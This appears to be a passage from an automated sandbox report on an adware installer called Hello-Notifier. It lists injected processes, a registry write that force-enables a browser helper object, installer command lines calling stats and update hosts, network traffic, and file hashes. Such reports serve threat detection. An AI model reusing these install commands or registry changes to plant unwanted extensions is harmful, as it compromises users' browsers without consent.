PID 4504 wrote to memory of 5072 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\system32\regsvr32.exe
PID 4504 wrote to memory of 5072 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\system32\regsvr32.exe
PID 3788 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bg.exe
PID 3788 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bg.exe
PID 3788 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bg.exe

System policy modification

evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\{11111111-1111-1111-1111-110311791128} = "1" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe

"C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe"

C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe

"C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe"

C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe

"C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe" /installxpi /agentregpath='Hello-Notifier' /extensionfilepath='C:\Program Files (x86)\Hello-Notifier\37928.xpi' /appid=37928 /srcid='000249' /subid='0' /zdata='0' /bic=0CC34B9305CC4362B008DD8A4336894AIE /verifier=bf3eda078706ebe98e31a33824224eec /installerversion=1_34_1_29 /installerfullversion=1.34.1.29 /installationtime=1729894738 /statsdomain=http://stats.srvstatsdata.com /errorsdomain=http://errors.srvstatsdata.com /waitforbrowser=300 /extensionid=b2c81c06-4b2f-4808-b3ab-ef6f49041f37@f562099a-8022-43b2-aad5-98abd7b264a4.com /extensionversion=0.93 /prefsbranch=ab2c81c064b2f4808b3abef6f49041f37f562099a802243b2aad598abd7b264a4com37928 /updateurl=https://w9u6a2p6.ssl.hwcdn.net/plugin/ff/update/37928.rdf /extensionname='Hello-Notifier' /extensiondesc='Hello Notifier extention' /publishername='Hello-Notifier' /defbro=ie /allusers /allprofiles /checkfflist /autoupdateulr='http://update.srvstatsdata.com/ff_agent_updates/{CAMP_ID}/update.json' /showthankyoupage /runfrom='installer' /externallog='C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894738.log'

C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe

"C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe" /installapp /agentregpath='Hello-Notifier' /appid=37928 /srcid='000249' /subid='0' /zdata='0' /bic=0CC34B9305CC4362B008DD8A4336894AIE /verifier=bf3eda078706ebe98e31a33824224eec /installerversion=1_34_1_29 /installerfullversion=1.34.1.29 /installationtime=1729894738 /statsdomain=http://stats.srvstatsdata.com /errorsdomain=http://errors.srvstatsdata.com /codedownloaddomain=http://app-static.crossrider.com /defbro=ie /allusers /runfrom=installer /externallog='C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894738.log' /downloadfromlocalpath='file://C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\extensionData'

C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe

"C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe" /updateapp /dontsenddaily /agentregpath='Hello-Notifier' /appid=37928 /srcid='000249' /subid='0' /zdata='0' /bic=0CC34B9305CC4362B008DD8A4336894AIE /verifier=bf3eda078706ebe98e31a33824224eec /installerversion=1_34_1_29 /installerfullversion=1.34.1.29 /installationtime=1729894738 /statsdomain=http://stats.srvstatsdata.com /errorsdomain=http://errors.srvstatsdata.com /codedownloaddomain=http://app-static.crossrider.com /defbro=ie /allusers /runfrom=installer-update /externallog='C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894738.log'

C:\Windows\SysWOW64\regsvr32.exe

regsvr32 /s "C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bho.dll"

C:\Windows\SysWOW64\regsvr32.exe

regsvr32 /s "C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bho64.dll"

C:\Windows\system32\regsvr32.exe

/s "C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bho64.dll"

C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bg.exe

"C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bg.exe" /executebg /externallog='C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894738.log'

C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe

"C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe" /enablebho /agentregpath='Hello-Notifier' /appid=37928 /srcid='000249' /subid='0' /zdata='0' /bic=0CC34B9305CC4362B008DD8A4336894AIE /verifier=bf3eda078706ebe98e31a33824224eec /installerversion=1_34_1_29 /installationtime=1729894738 /statsdomain=http://stats.srvstatsdata.com /errorsdomain=http://errors.srvstatsdata.com /bhoguid=11111111-1111-1111-1111-110311791128 /defbro=ie /allusers /autoupdateulr='http://update.srvstatsdata.com/ie_enable_agent_updates/{CAMP_ID}/update.json' /runfrom='installer' /externallog='C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894738.log'

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 errors.srvstatsdata.com udp
SG 13.251.16.150:80 errors.srvstatsdata.com tcp
US 8.8.8.8:53 150.16.251.13.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 update.srvstatsdata.com udp
US 8.8.8.8:53 69.209.201.84.in-addr.arpa udp
SG 13.251.16.150:80 update.srvstatsdata.com tcp
SG 13.251.16.150:80 update.srvstatsdata.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 stats.srvstatsdata.com udp
SG 13.251.16.150:80 stats.srvstatsdata.com tcp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 stats.mstatsserv.com udp
SG 13.251.16.150:80 stats.srvstatsdata.com tcp
SG 13.251.16.150:80 stats.srvstatsdata.com tcp
SG 13.251.16.150:80 stats.srvstatsdata.com tcp
US 8.8.8.8:53 app-static.crossrider.com udp
SG 13.251.16.150:80 stats.srvstatsdata.com tcp
SG 13.251.16.150:80 stats.srvstatsdata.com tcp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
SG 13.251.16.150:80 stats.srvstatsdata.com tcp
SG 13.251.16.150:80 stats.srvstatsdata.com tcp
US 8.8.8.8:53 stats.mstatsserv.com udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 210.108.222.173.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\System.dll

MD5 00a0194c20ee912257df53bfe258ee4a
SHA1 d7b4e319bc5119024690dc8230b9cc919b1b86b2
SHA256 dc4da2ccadb11099076926b02764b2b44ad8f97cd32337421a4cc21a3f5448f3
SHA512 3b38a2c17996c3b77ebf7b858a6c37415615e756792132878d8eddbd13cb06710b7da0e8b58104768f8e475fc93e8b44b3b1ab6f70ddf52edee111aaf5ef5667

C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\WrapperUtils.dll

MD5 7a18f06f0935a9e98a14d47d77064573
SHA1 58b12858557fb39cf876b6e76e585cf581b53590
SHA256 422a61da2bedfdc8167cb022b4b5e0ff8588dc1e6bd40b3c4ba97588836f1b0f
SHA512 356fa81d066db57054d5477e96d12ca9a5e9639731c06d61dc320dc52bf6054f603523e2da3751a96a4608dc19c20868ed3573ccdf3d32bef025035770a434e6

C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\StdUtils.dll

MD5 21010df9bc37daffcc0b5ae190381d85
SHA1 a8ba022aafc1233894db29e40e569dfc8b280eb9
SHA256 0ebd62de633fa108cf18139be6778fa560680f9f8a755e41c6ab544ab8db5c16
SHA512 95d3dbba6eac144260d5fcc7fcd5fb3afcb59ae62bd2eafc5a1d2190e9b44f8e125290d62fef82ad8799d0072997c57b2fa8a643aba554d0a82bbd3f8eb1403e

C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe

MD5 a4c3e2148c1e6f2298ca76e998d32efb
SHA1 309b580cf1386e24eba522c79c4d7ce2d1fd84a9
SHA256 7f0141ce147904a3c0debd19f46cb1111ce6315459b34b34b5039ed670862cd4
SHA512 234578790ff105eb7dde8ce6b785fbbd413a11aec85d6231bd4307ba229844eddb6060c7b5cc7ac545f901a8651966b02f350cb26fcc08c1dc7e0309455e5fc1

C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\nsislog.dll

MD5 e47100b70748fc790ffe6299cdf7ef2d
SHA1 ad2a9cd5f7c39121926b7c131816e7ba85aeead2
SHA256 271d539fe130276189e0a32b8a0bc9f08f2d92f7e17f85d88726735f14ea6144
SHA512 88452a9aeff453e7979df9240ab396cbc0c5d00efecda97df1e46f2ba1e9b5bfd990921e85d503beb4b35a1de7681390ba124eeeaf896f250717892ced133e93

memory/3788-36-0x0000000002430000-0x0000000002440000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\InstallerUtils2.dll

MD5 8c17aa401cdc9bfe61b57f4d4bfec362
SHA1 8c580457b636bc30bedb476cebb9a50d9f02651d
SHA256 dfc863b01224a8d3bf35ef6064d6051aab295b9618db72647202f9ca97e45d19
SHA512 9fa29aab6cde651a0afb8cacf3dc2ee063b4351c7cf16c49668b2b59062914dbe53c93368e7b2a73a267c4d3eddd513fe7ac282422cf06397d2ad8839c3cd881

C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\nsisos.dll

MD5 69806691d649ef1c8703fd9e29231d44
SHA1 e2193fcf5b4863605eec2a5eb17bf84c7ac00166
SHA256 ba79ab7f63f02ed5d5d46b82b11d97dac5b7ef7e9b9a4df926b43ceac18483b6
SHA512 5e5e0319e701d15134a01cb6472c624e271e99891058aef4dfe779c29c73899771a5b6f8b1cd61b543a3b3defeaecaa080c9cc4e76e84038ca08e12084f128eb

C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894738.log

MD5 ce14bd5475369423463ca07da9e13db4
SHA1 810fef89a7b7b04a0c5f34760f4116cc4f805717
SHA256 c3a1e1b4cb77a85df726d172284297e1d7e00a93395c966dbad6635cb529dbb9
SHA512 b4cfcb51485b0427ade131e1c5888cd56df2cef904750410e796b0c0ece74454ed82aee2401778a7618c1784d49cdc89dd5ee67d4cdf481a6430ecf6e94fa3f0

memory/3788-315-0x0000000002430000-0x0000000002439000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\md5dll.dll

MD5 0745ff646f5af1f1cdd784c06f40fce9
SHA1 bf7eba06020d7154ce4e35f696bec6e6c966287f
SHA256 fbed2f1160469f42ce97c33ad558201b2b43e3020257f9b2259e3ce295317a70
SHA512 8d31627c719e788b5d0f5f34d4cb175989eaa35aa3335c98f2ba7902c8ae01b23de3ccb9c6eb95945f0b08ef74d456f9f22ca7539df303e1df3f6a7e67b358da

C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\InstallerUtils.dll

MD5 895bc798fb0d31e5d3e584ae5701925b
SHA1 d5184d234c1768d3fe671be1512bb58688b37698
SHA256 050bcec7226cfe81328bd44de1091355d368f1e9183d232eef1f598ffbd3bc99
SHA512 b0b0a108f8c21e4f9420245646c546293ea1138580d47dae35b2e467bb2752d7c2cc9df490fdac9e2596acc258dfaa13df8bbf98d45c9f7d77418ac7fdf5cf7b

memory/3788-356-0x0000000004120000-0x0000000004130000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\UserInfo.dll

MD5 7579ade7ae1747a31960a228ce02e666
SHA1 8ec8571a296737e819dcf86353a43fcf8ec63351
SHA256 564c80dec62d76c53497c40094db360ff8a36e0dc1bda8383d0f9583138997f5
SHA512 a88bc56e938374c333b0e33cb72951635b5d5a98b9cb2d6785073cbcad23bf4c0f9f69d3b7e87b46c76eb03ced9bb786844ce87656a9e3df4ca24acf43d7a05b

C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\inetc.dll

MD5 4c01fdfd2b57b32046b3b3635a4f4df8
SHA1 e0af8e418cbe2b2783b5de93279a3b5dcb73490e
SHA256 b98e21645910f82b328f30c644b86c112969b42697e797671647b09eb40ad014
SHA512 cbd354536e2a970d31ba69024208673b1dc56603ad604ff17c5840b4371958fc22bafd90040ae3fb19ae9c248b2cfce08d0bc73cc93481f02c73b86dbc0697b2

memory/3768-427-0x0000000000400000-0x0000000000499000-memory.dmp

memory/3788-428-0x0000000000400000-0x00000000005B6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\temp_file_after.tmp

MD5 064d2a2851c44f039fa89e24672ec065
SHA1 2b6a7e3b294a73c63d8d013541bd70617dfb026a
SHA256 f2d61b9b2d422007fc273a93c6718a7d7264e5245fde3d2716d40a63340fdd07
SHA512 93dcfc3ee338b98508f784470347789d4cb6a49fb4c2d0d3c28fc924477c577ff506da787ca6b71f79e3eeac85d63bf3ddc3dc6805d95cb22fbde4aceea5d397

memory/3788-516-0x0000000004F50000-0x0000000004F60000-memory.dmp

memory/3788-522-0x0000000004F60000-0x0000000004F70000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894738.log

MD5 5b1165ca2b57bcb379a4db800e60d821
SHA1 fe82f726c47198f95e05c0a4634991e0246b39f4
SHA256 2e874618fe401daca2f82e902bb77760a202eb8394ab70cbdc3fd294fe297ecb
SHA512 8d6080dc0b9a08150a9df1f942f313f6d6f788946a6fb82710bb286dd598ee842f733c25ee939f239213a3213872e1db495958c516cfe18b8ba9df584748e53d

C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\temp_file_after.tmp

MD5 6d586d990046caa6363e0cfcf654f198
SHA1 b2bac57dfd1fca1fdfe8c233febcb6486c54fa16
SHA256 7dccabfab5396ca85ac6c45ba244d25c58279dbec948cda456355ef32e7ca0a1
SHA512 199ea6c9c050c1182736adc04aa6b021a7ebf9afe486fdc551f3bf2191e102fb8e61aefa4d850d6714e24cd3cd109b172bcbd857601513bdcfa1095eea252b68

C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\temp_file_after.tmp

MD5 4cf2227b60c543ab53e2e4bc710700f4
SHA1 c1811d55523373c6144f165f48fec686cd31e7d1
SHA256 fdd5b3df83a9e8a15114785a58e8c65cbf0c577d2ea124db12646c587daca1cf
SHA512 d862d1d373820d03e6da4b19a4cfaa08c4bf213eec1059c3c08606eea393e31b04b1a135b58ef0e41dd8ac5a1a40777902423e41cfe0a6f02220f72e574caeea

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3yrocb08.Admin\extensions\b2c81c06-4b2f-4808-b3ab-ef6f49041f37@f562099a-8022-43b2-aad5-98abd7b264a4.com\skin\crossrider_statusbar.png

MD5 8b1eb9cb80417ec0022d278a44ab1dc7
SHA1 c49eb73f79e70b8ed96d91ef62f0bc344e41219a
SHA256 e358d97ba4c51b987fe73ea0ac0f14f9b2375e299f3e859fc37c21ab8b051ee6
SHA512 0324f2785d09f04c5be9ee77f1cb80a7afe06d66672baa862f63ec8ac59a2ae58199db91bb28e18409e918b222dcf09269013a270284213473ffa974d842c7d7

C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\temp_file_after.tmp

MD5 e6d0a9a8cb734bc1f13d57c730e129fa
SHA1 e5065caded5b9f4f7f38a6120d4b84b8aca33bfd
SHA256 f966a16b792a66563a303797075aa68ea471adbd7fcf0c9491604554c7224ee0
SHA512 802864ae5a1d50b0ad1e0acd5d922b116d68213c1792e7462fd0f1d314d2cfd1237d970e3e6577507180d6a2af947746a61798264602c19c292f89eaddf84485

C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\ExecDos.dll

MD5 ebcf9f71d804abab3c2e5ce4c17dc22e
SHA1 17d13084e75cbfa5fbfdd0025e9a0ee5772ae765
SHA256 d387b725afbd2a6f9b44999278d21025fae55b391e45f7751b88dfb13511a993
SHA512 5576396c2d885c039668d7f401eeee583eb4de39e8497c3aaec32d47f4417a522fe6786c111d50a5fba7570f50e84144ef3a8aea42677d170e79114343c3a4a1

C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\temp_file_after.tmp

MD5 333d5ced229832b138268ff54d3ae8c5
SHA1 0e1be1479ff70bf2220299618b297932d3426a2a
SHA256 beefa3144e2830a09be1cc8ee3ce6835df5c93708a0b962c8321c3acbad99ac2
SHA512 4810791890abe1e95a597b9bfaa9fdf8c6864e880b8cb26be90b858624a33f95972c6cd4272a3ec93578c95a50d0246c043a469774c0b17b17d349c2937e60aa

C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\temp_file_after.tmp

MD5 0038eee3ef38e361affee24de52d7fa7
SHA1 27c0f9557899fbf642a558b26f70890cfca94724
SHA256 db98f86a332e2dfab8fce26769a2f2631f52aa0ce7c6e15522b202d28358ef28
SHA512 1926e9153243182db1f43b3542d3cca07277987632df1ea0bff0f0bcbf499fdec5eda4da4ee1dd003658fcb0fba1ef8f8c01dca0d8c39b196095a4e4197d0be9

C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\temp_file_after.tmp

MD5 5d63f77328c34a31259218b0411293b0
SHA1 fe367236de21f4251831c2f37916134b98841a8a
SHA256 a7a33dd0cc2d9cdc4a0a66630f52621cdf08b2498a0832e491411893804dcf58
SHA512 594fe90286f402f5744da0cda0ff770a7df45e46138d592b14ee7bfd2c7ec27dcfc739ed28f8a88f6683d107fbdf2f821cac236d14ca94fd9ce660f5af21f2d0

C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\temp_file_after.tmp

MD5 6a6653d172238dec2ff28b8b755e504c
SHA1 eb65446878e74bf5061402aa8e35bb1658cc7d07
SHA256 edc53b6902099c6716cf3e8bece2fd43faafdd49118f9e5db2b7d7c3caed6bb8
SHA512 a9f5cda9d7783b516a0830a1ef04fbfd8ba2fe86ec5e9c79c66de37a5df36ef7c62879d6f1aac7fda452bf9d4f75dabdac0bc58e6a2d8888f89ace41f7ae1c58

C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\temp_file_after.tmp

MD5 77d5b0d8c2009f6bc8798a8d1001c6ec
SHA1 42b423e5358d59dd9e931411e6b5ac5b54bb2b95
SHA256 3a13144df92f8922461e2cb47f912811123883c7bfcb04dcbf085a85b4216c19
SHA512 06849bbb8a9e46445dc30f19fec6d6de0325d0981468ed5c9032b8c74d95252067af71913f67c8d86796d6f97df5784e81a526fcee77e4aa688645d62ad22594

C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\temp_file_after.tmp

MD5 b67172dc03787059255910a04e503c1f
SHA1 c5fa607ce7f49ea21be99e85c81e08b48ff6e6a6
SHA256 a5d9296206bb705d8ea2caa0296ea45b2534f7c0d306a7253f20e90a999f70e0
SHA512 835b1672a22466de661a78577f0234bc4ad941a2787acdf695589d1d68d7607328edf9f33f747f6d945b54b9a81fe0893d6af1671c8af054208450a17c61f7b3

C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\temp_file_after.tmp

MD5 e3e7b6547cbc72cd52dba5012113cbaf
SHA1 1c6f747cccd7034b81cf4907f236cbd098fd030b
SHA256 7333697624997e5b91986eed05d29c24e871c689ccf38aec78b1173936c628bd
SHA512 7fb9e707afc16da8e0d11dfd8244a345db58f59c6b8b9fc2eba3ba580432164805f715da797c93c7e1d4f9f3bc51cfb5afb3c740abc6901ecf56a6699d01e43f

C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\temp_file_after.tmp

MD5 1e1a99d240ed5b18da059b516f339f99
SHA1 48aa01a58ba7e98b3e080f7ada1c5697c198298b
SHA256 9a4fce8f4f6f6697f795220a9889a0063e4496ff568121ef98e2652eec323ad3
SHA512 8f1d26b539da067fa3f4cb616b8b165a0f0abd6e923ecf20a68039ab5c0ff139df236703f5b42ebc20b4c6c9d7e2385430ebef61a5c20e22311880b14c3f7634

C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\temp_file_after.tmp

MD5 24e88dfa25d52544039eed843dec878d
SHA1 a4a49a2ad1fca719e48ca91ec2690effe46c362f
SHA256 759ef12969121dbd07092c62b7d529584c4115e4690d736bdb5e82f7d41ee765
SHA512 7f3888685fd776f36941556c645aee0c692d447d75baad7600c2d36a47e0853f17c178f1e865b3ccde78634c2551eb0c08bb8db586afb42aedec9ccadd6b0822

C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\temp_file_after.tmp

MD5 9a294e54b99b6ce9d3903bfb7354f88e
SHA1 82a5811657bd9fe992269f140d0e64281500f098
SHA256 72c1270892564c368832db8c464c20b8982191a5f9f634cc6c5f4954c47126b7
SHA512 c0ac7cc9d90c35c980a533cef369d819da91eaeeae6569e04bf0c40fb9397aa263890a5a2570f3dca4e162d6e62afd56956dc3037e63909fc83e0c798a13d49e

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-25 22:18

Reported

2024-10-25 22:20

Platform

win7-20240903-en

Max time kernel

118s

Max time network

123s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2396 -s 220

Network

N/A

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-10-25 22:18

Reported

2024-10-25 22:20

Platform

win10v2004-20241007-en

Max time kernel

99s

Max time network

102s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3516 wrote to memory of 3552 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3516 wrote to memory of 3552 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3516 wrote to memory of 3552 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3552 -ip 3552

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 612

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp
US 8.8.8.8:53 99.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 101.11.19.2.in-addr.arpa udp
US 8.8.8.8:53 226.108.222.173.in-addr.arpa udp
US 8.8.8.8:53 102.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-10-25 22:18

Reported

2024-10-25 22:20

Platform

win7-20240903-en

Max time kernel

118s

Max time network

121s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\WrapperUtils.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\WrapperUtils.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\WrapperUtils.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2764 -s 220

Network

N/A

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-10-25 22:18

Reported

2024-10-25 22:21

Platform

win10v2004-20241007-en

Max time kernel

109s

Max time network

117s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\WrapperUtils.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4832 wrote to memory of 4836 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4832 wrote to memory of 4836 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4832 wrote to memory of 4836 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\WrapperUtils.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\WrapperUtils.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4836 -ip 4836

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 600

Network

Country Destination Domain Proto
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 71.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 110.11.19.2.in-addr.arpa udp
US 8.8.8.8:53 73.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
